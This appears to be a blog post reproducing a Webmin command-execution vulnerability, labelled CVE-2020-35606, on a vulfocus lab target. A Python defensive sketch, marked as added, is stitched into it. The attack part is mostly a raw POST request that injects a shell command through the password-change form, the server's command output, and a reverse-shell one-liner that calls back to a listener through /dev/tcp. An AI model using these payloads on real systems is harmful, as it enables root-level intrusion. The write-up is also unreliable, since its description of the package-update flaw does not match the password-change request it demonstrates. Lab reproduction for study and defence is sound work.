CVE-2020-35606 Webmin Command Execution Reproduction

Vulnerability details:

This module exploits an arbitrary command execution vulnerability in Webmin version 1.962 and lower. Any user authorized for the "Package Updates" module can execute arbitrary commands with root privileges. The issue arises from bypassing the measure taken for CVE-2019-12840: the s/\(-)|\(.)/string/g; escaping is insufficient to prevent it. Since the package name variable is placed directly into a system command, we can manipulate it with some escape characters that HTTP supports. For example, we can escape control by moving the command onto the next line, which is done with the URL-encoded line values "%0A" and "%0C". In addition, for the payload to work properly, we have to append a double ampersand (&&) (%26%26) to the end of the payload.
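Added example (not from the original post and not Webmin's own code): a Python sketch of why a character blocklist fails against the %0A/%0C line-break bypass described above, beside an allow-list validator, an argv builder that never hands the value to a shell, and a per-field request-body check a WAF or log pipeline could use to flag such values. The blocklist regex, the package-name pattern and the form bodies are constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Allow-list for package names (constructed for this example, modelled on
# Debian package-name rules; it is not Webmin's own check).
PKG_NAME_RE = re.compile(r"[a-z0-9][a-z0-9+.\-]{1,127}")

# Characters that end or chain a shell command even when ';', '|' and '`'
# are filtered: CR/LF, vertical tab, form feed (the %0A / %0C bypass) and '&&'.
CONTROL_RE = re.compile(r"[\r\n\x0b\x0c]|&&")


def weak_filter(pkg: str) -> str:
    """Constructed blocklist in the spirit of an insufficient fix: it strips a
    few metacharacters but leaves line breaks and '&' untouched, so the value
    still spans two shell commands once spliced into a command line."""
    return re.sub(r"[;|`$()<>'\"]", "", pkg)


def is_safe_package_name(pkg: str) -> bool:
    """Allow-list check: only names matching PKG_NAME_RE in full are accepted.
    Control characters, spaces and '&' cannot match, so nothing needs escaping."""
    return PKG_NAME_RE.fullmatch(pkg) is not None


def build_argv(pkg: str) -> list:
    """Argv for subprocess.run(argv) without shell=True: the package name
    travels as one argument and is never re-parsed by /bin/sh."""
    if not is_safe_package_name(pkg):
        raise ValueError("rejected package name: %r" % pkg)
    return ["apt-get", "install", "-y", "--", pkg]


def suspicious_fields(form_body: str) -> list:
    """Detection helper: URL-decode each form field and return the names of
    fields carrying line breaks or '&&'. Decoding per field matters: in the
    raw body, '%26%26' is data inside one value, not a parameter separator."""
    return [name for name, value in parse_qsl(form_body, keep_blank_values=True)
            if CONTROL_RE.search(value)]


# Constructed request bodies: a benign one and the two bypass variants.
BENIGN_BODY = "u=openssl&mode=install"
NEWLINE_BODY = "u=openssl%0Aid%26%26&mode=install"
FORMFEED_BODY = "u=openssl%0Cid%26%26&mode=install"

if __name__ == "__main__":
    for body in (BENIGN_BODY, NEWLINE_BODY, FORMFEED_BODY):
        pkg = dict(parse_qsl(body))["u"]
        print(repr(pkg), "blocklist leaves break:", bool(CONTROL_RE.search(weak_filter(pkg))),
              "allow-list ok:", is_safe_package_name(pkg), "flagged:", suspicious_fields(body))
```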

Reproduction steps:

The experiment was carried out on http://vulfocus.fofa.so/

Target address: https://vulfocus.fofa.so:48998/

POST request:

POST /password_change.cgi HTTP/1.1
Host: vulfocus.fofa.so:48998
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
Origin: https://vulfocus.fofa.so:48998
Connection: close
Referer: https://vulfocus.fofa.so:48998/
Cookie: redirect=1; testing=1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

user=1&pass=1&expired=2&old=dir&new1=test22&new2=test22

Response:

<center><h3>Failed to change password : The current password is incorrectCHANGELOG              config.info.ru.UTF-8      module.info.es.UTF-8

</h3></center>

Reverse shell

Remote server:

nc -vvlp 8888

test|bash -c "bash -i >%26 /dev/tcp/xxx.xxx.xxx.xxx/8888 0>%261"

posted @ 2021-11-30 09:12 by 低调的思考